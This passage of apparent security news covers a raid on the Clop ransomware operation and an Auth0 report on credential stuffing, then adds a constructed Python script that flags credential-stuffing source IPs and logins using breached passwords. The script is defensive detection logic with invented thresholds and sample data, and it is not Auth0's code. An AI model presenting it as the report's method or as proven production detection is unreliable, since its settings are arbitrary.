    In spite of the press around the raid, many online noted that the leak site used by Clop members is still up. A source from cybersecurity company Intel 471 threw cold water on the excitement around the raid in an interview with Bleeping Computer. They told the news outlet that they do not think any of the major players behind Clop were arrested in the raid because those people live in Russia. They added that the people arrested were mostly involved in the money laundering part of the ransomware operation.

    Clop rose to prominence in 2020 after demanding a ransom of more than $20 million from Software AG, one of the largest software companies in the world. Multiple cybersecurity companies have reported that Clop has ties to a malware distribution group named TA505 and a cybercrime group known as FIN11. Ransomware groups are facing increased scrutiny from law enforcement globally as hundreds of organizations continue to deal with the crippling aftereffects of attacks. Bromley noted that last week the Avaddon ransomware shut down its operations, and the Ziggy ransomware did the same earlier this year, signaling that the increasing law enforcement pressure was having an effect. “Arrests and operations targeting ransomware infrastructure must continue in the short term, in order to maintain pressure on ransomware operators,” Bromley added.

    Vectra CTO Oliver Tavakoli said raids like this are one of the key levers that can be used to shrink the lucrative ransomware ecosystem. “When the likelihood of repercussions rise, less people will be drawn into the business of ransomware,” Tavakoli said. “When periodic disruptions occur in the supply chain of ransomware and sometimes ransoms are reclaimed (as the FBI recently did with some of the Colonial Pipeline ransom payments), the business of ransomware itself becomes less lucrative and less people are drawn into it.”

    Other experts noted the timing of the raid, which came on the same day as the summit between US President Joe Biden and Russian President Vladimir Putin. Ransomware was a significant topic of discussion, Biden said after the meeting. “This is a bold move, especially given Ukraine’s tensions with Russia. It would be better to see comprehensive global law enforcement efforts take hold,” said Hitesh Sheth, CEO at Vectra. “Cybersecurity has displaced nuclear arms as the premier superpower security issue of our era. We can hope the Biden-Putin summit leads to cooperation and structural progress in this area.”

  • in

    Travel and retail industries facing wave of credential stuffing attacks

    A new report from Auth0 has discovered that government institutions as well as travel and retail companies continue to face an inordinate amount of credential stuffing attacks. 


    Auth0, which was recently acquired by Okta for $6.5 billion, released startling statistics on what it is seeing in its State of Secure Identity report. In the first three months of 2021, Auth0 found that credential stuffing accounted for 16.5% of attempted login traffic on its platform, with a peak of over 40% near the end of March. About 15% of all attempts to register a new account can be attributed to bots, according to Auth0, which found that for certain industries the numbers are even higher.

    The report also said that Auth0 maintains a constantly growing database of username-password pairs known to have been compromised in data breaches. For the first 90 days of 2021, the Auth0 platform detected an average of more than 26,600 breached passwords being used each day. On Feb. 9, the number reached a 2021 high of more than 182,000. Attackers will spend between $50 and $1,000 for validated credentials for credit card records, crypto accounts, social media accounts and even Netflix accounts, according to the report. The most commonly detected threats on Auth0’s platform include credential stuffing, fraudulent registrations, MFA bypass, and breached password usage.

    Auth0’s platform found that 39% of IP addresses associated with credential stuffing attacks are based in the US. The technology and travel industries account for more than 50% of all SQL injection attacks seen on the platform. Travel and retail enterprises are targeted the most by brute force activity, followed by government institutions, industrial services companies and technology organizations. The technology industry faces the most MFA brute force attempts at 42% on Auth0’s platform, followed by consumer goods at 15% and financial services at 13%. Auth0 noted that attackers often target rewards programs offered by restaurants or stores because “they are rarely secured well and the benefits are easily monetized.”

    Companies in the financial services industry lead the way in MFA adoption, followed by technology and industrial services, according to the report. While most people choose email or SMS as their MFA factor, many use time-based one-time passcodes as well. Many organizations in the technology, financial services and industrial services industries are also using bot detection programs as a way to slow down or limit credential stuffing attacks. Duncan Godfrey, vice president of security engineering at Auth0, said it is becoming harder and harder for security companies to secure their customers’ identities because of the widespread failure to protect data and the prevalence of breached passwords. The availability of automated attack tools has made the humble password “a protective measure from the past,” Godfrey explained. Multiple breaches and cyberattacks in the last month originated from reused passwords or account details that had been leaked in previous attacks.
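    An added example, not code from Auth0 or the report, of the two signals the report quantifies, run over constructed login events: source IPs that spray many different accounts with mostly failed attempts (the credential stuffing share of login traffic), and successful logins whose password appears in a breach corpus. The event format, the thresholds and the SHA-1 breach set are assumptions.

```python
"""Detection logic for two identity-platform metrics over constructed login
events: the share of login traffic from credential-stuffing sources, and
successful logins using a password already known from a breach corpus.
Added example; the event format, thresholds and corpus are assumptions."""
import hashlib
from collections import defaultdict

# Constructed sample events: (source_ip, username, password, success). Not real data.
EVENTS = [
    ("198.51.100.7", "alice", "Password1", False),
    ("198.51.100.7", "bob", "Password1", False),
    ("198.51.100.7", "carol", "Password1", False),
    ("198.51.100.7", "dave", "letmein", False),
    ("198.51.100.7", "erin", "qwerty", True),
    ("203.0.113.9", "alice", "correct-horse", True),
    ("203.0.113.9", "alice", "corect-horse", False),
    ("192.0.2.4", "frank", "hunter2", True),
]

# Constructed breach corpus, kept as SHA-1 digests so no plaintext is stored.
BREACHED = {hashlib.sha1(p.encode()).hexdigest() for p in ("Password1", "qwerty", "hunter2")}


def stuffing_sources(events, min_users=3, min_fail_ratio=0.5):
    """IPs that try many distinct accounts with a high failure rate: the stuffing signature."""
    per_ip = defaultdict(list)
    for ip, user, _pw, ok in events:
        per_ip[ip].append((user, ok))
    flagged = set()
    for ip, tries in per_ip.items():
        users = {u for u, _ in tries}
        fails = sum(1 for _, ok in tries if not ok)
        if len(users) >= min_users and fails / len(tries) >= min_fail_ratio:
            flagged.add(ip)
    return flagged


def stuffing_share(events):
    """Fraction of all login attempts that came from flagged stuffing sources."""
    bad = stuffing_sources(events)
    return sum(1 for e in events if e[0] in bad) / len(events)


def breached_password_logins(events, corpus=BREACHED):
    """Usernames that authenticated successfully with a password in the breach corpus."""
    return sorted(user for _ip, user, pw, ok in events
                  if ok and hashlib.sha1(pw.encode()).hexdigest() in corpus)


if __name__ == "__main__":
    print(f"credential stuffing share of login traffic: {stuffing_share(EVENTS):.1%}")
    print("successful logins with breached passwords:", breached_password_logins(EVENTS))
```

    Accounts flagged by the second check are candidates for a forced password reset or an MFA step-up; the first check is the per-source view behind a traffic-share figure like the report's 16.5%.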